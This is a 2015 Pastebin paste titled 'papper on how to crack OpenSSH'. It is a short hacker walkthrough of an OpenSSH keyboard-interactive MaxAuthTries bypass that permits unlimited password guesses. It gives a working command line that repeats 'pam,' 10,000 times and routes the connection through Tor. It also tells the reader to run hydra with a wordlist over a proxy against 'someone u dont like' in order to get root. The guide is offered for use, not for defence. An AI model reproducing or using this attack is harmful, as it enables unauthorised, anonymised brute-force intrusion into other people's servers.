PH1K3

papper on how to crack OpenSSH by PH1K3

Aug 15th, 2015
1,349
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Cracking Openssh by PH1K3
  2.  
  3. big up : z0x,h1tman , sn , psy n all the other guys on the net
  4.  
  5. openssh is one of the biggest ssh systems on the net
  6.  
  7. this vuln is found by kingcope and works on all version of openssh on all linux , unix and *bsd systems .
  8. tested on:
  9. Freebsd , Centos , Debian(7 n 8) ,Netbsd(in virtual box) , ubuntu and kali
  10.  
  11. orignal link to it:https://kingcope.wordpress.com/2015/07/16/openssh-keyboard-interactive-authentication-brute-force-vulnerability-maxauthtries-bypass/
  12.  
  13. this lets u bruteforce an openssh ssh login , so instead of getting 3 tries u get unlimited tries.
  14.  
  15. what u need:
  16. 1:tor socks
  17. 2:one vpn or http proxy
  18. 3:an multi threaded ssh cracker with proxy support(like hydra)
  19. 4:a target (take someone u dont like or just open a virtual box )
  20.  
  21. first if u dont got the program 'usewithtor' install it ,
  22.  
  23. get a wordlist from packetstorm (https://packetstormsecurity.com/Crackers/wordlists)
  24.  
  25. open 2 terminals and an ssh cracker (use a multithreaded one ) im going to use hydra cuz its fast and got proxy support config hydra with 25 threads, port 22, target ip , http-proxy and a wordlist.
  26. in the second terminal we are going to use tor to connect to the targets ssh and hold the connection like this:
  27. root@thePH1K3m4chin3:~# usewithtor ssh -lroot -oKbdInteractiveDevices=`perl -e 'print "pam," x 10000'` targetip
  28.  
  29. root@TARGETIP's password:
  30.  
  31. extras: enum some user to have a bigger attack surface
  32.  
  33.  
  34. start the ssh cracker and let it do the work and u should get root
  35.  
  36. /PH1K3 , keep it real n im comming with fresh shit soon stay tuned
RAW Paste Data